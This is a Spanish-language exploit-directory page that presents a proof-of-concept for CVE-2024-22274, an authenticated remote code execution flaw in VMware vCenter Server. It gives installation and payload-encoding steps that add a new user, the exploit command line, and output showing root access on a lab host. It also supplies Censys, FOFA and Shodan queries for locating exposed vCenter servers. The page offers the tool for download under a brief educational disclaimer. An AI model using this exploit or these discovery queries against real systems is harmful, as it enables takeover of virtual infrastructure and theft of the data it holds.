Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22274-RCE — PoC - Ejecución remota de código autenticada en VMware vCenter Server (Exploit) | Kitploit
Herramientas/GitHubGitHub/l0n3m4n/cve-2024-22274-rce
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
GitHubl0n3m4n/cve-2024-22274-rce

CVE-2024-22274-RCE

PoC - Ejecución remota de código autenticada en VMware vCenter Server (Exploit)

Ver Repositorio
456hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escalada de Privilegios: RCE Autenticado en VMware vCenter Server

Facebook X Medium Python Kali

📜 Descripción

Los componentes de la API «com.vmware.appliance.recovery.backup.job.create» y «com.vmware.appliance.recovery.backup.validate» son vulnerables a un ataque de inyección de flags que puede aprovecharse para ejecutar comandos arbitrarios como usuario root en el sistema objetivo.

📚 Tabla de Contenidos

  • 📜 Descripción
  • 🛠️ Instalación
  • ⚙️ Uso
  • 🔎 Descubrimiento
  • 📝 Notas
  • 💁 Referencias
  • 📢 Aviso legal

🛠️ Instalación y Configuración

[!NOTE] Para que funcione este exploit PoC, debes tener credenciales válidas e iniciar sesión en el shell de VMware vCenter Server a través de SSH. El usuario debe tener el rol "admin", tal y como se especifica en el archivo vcenter_creds.txt.

root@kitploit:~
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE 
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt 

Ejecuta o modifica user2base64.sh para codificar en base64 el nuevo usuario añadido y automáticamente creará payload.txt

root@kitploit:~

$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt                                 

⚙️ Uso

VMware-vCenter

Versión Vulnerable

vulnerable-version

Ejecución y Explotación Exitosas

root@kitploit:~
$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   uid=0(root) gid=0(root) groups=0(root)

[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103

Ejecución Exitosa pero sin Acceso Root

Este ejemplo significa que te estás conectando, pero el payload no está configurado o cargado correctamente. Consulta el PDF del PoC para obtener información más detallada.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output: 
   No privileges escalation detected.

[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103

Falta el Nombre de Usuario o la Contraseña en el Archivo de Configuración

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: Username or password not found in configuration file.

Fallo de Conexión o Error SSH

Comprueba la dirección del host y las credenciales.

root@kitploit:~
 ___ ___ _______                                          ______               __              
|   |   |   |   |.--.--.--.---.-.----.-----.______.--.--.|      |.-----.-----.|  |_.-----.----.
|   |   |       ||  |  |  |  _  |   _|  -__|______|  |  ||   ---||  -__|     ||   _|  -__|   _|
 \_____/|__|_|__||________|___._|__| |_____|       \___/ |______||_____|__|__||____|_____|__|  
    
                Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
                                                                              
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.

🔎 Descubrimiento

  • CENSYS: "VMware vCenter", Filtro: services.port: 443 AND tags: "VMware"
  • FOFA: title="VMware vCenter", Filtro: port="443" && title="VMware vCenter"
  • SHODAN: "VMware vCenter", Filtro: port:443 "VMware vCenter"

📝 Notas

Este exploit PoC no será efectivo si no entiendes cómo interpretar el script, ya que ha sido modificado intencionalmente para evitar que los "script kiddies" simplemente lo copien y ejecuten sin comprensión. VMware vCenter Server es un componente crítico en la gestión de entornos virtualizados; si alguien accede a él, puede obtener el control total sobre la infraestructura virtual y exfiltrar datos sensibles. Este PoC está diseñado para quienes ya tienen un pequeño nivel de conocimiento técnico y pueden usarlo correctamente; por lo tanto, si eres un script kiddie que busca causar disrupción sin entender las implicaciones, este exploit no te será útil.

💁 Referencias

  • http://www.vmware.com/security/advisories
  • https://nvd.nist.gov/vuln/detail/CVE-2024-22274
  • https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202405-4049
  • https://bdu.fstec.ru/vul/2024-05108
  • https://github.com/advisories/GHSA-xm44-79f8-q8r7

📢 Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y de investigación. El creador no asume ninguna responsabilidad por el mal uso o los daños causados por la herramienta. Crear un issue

Descargar herramienta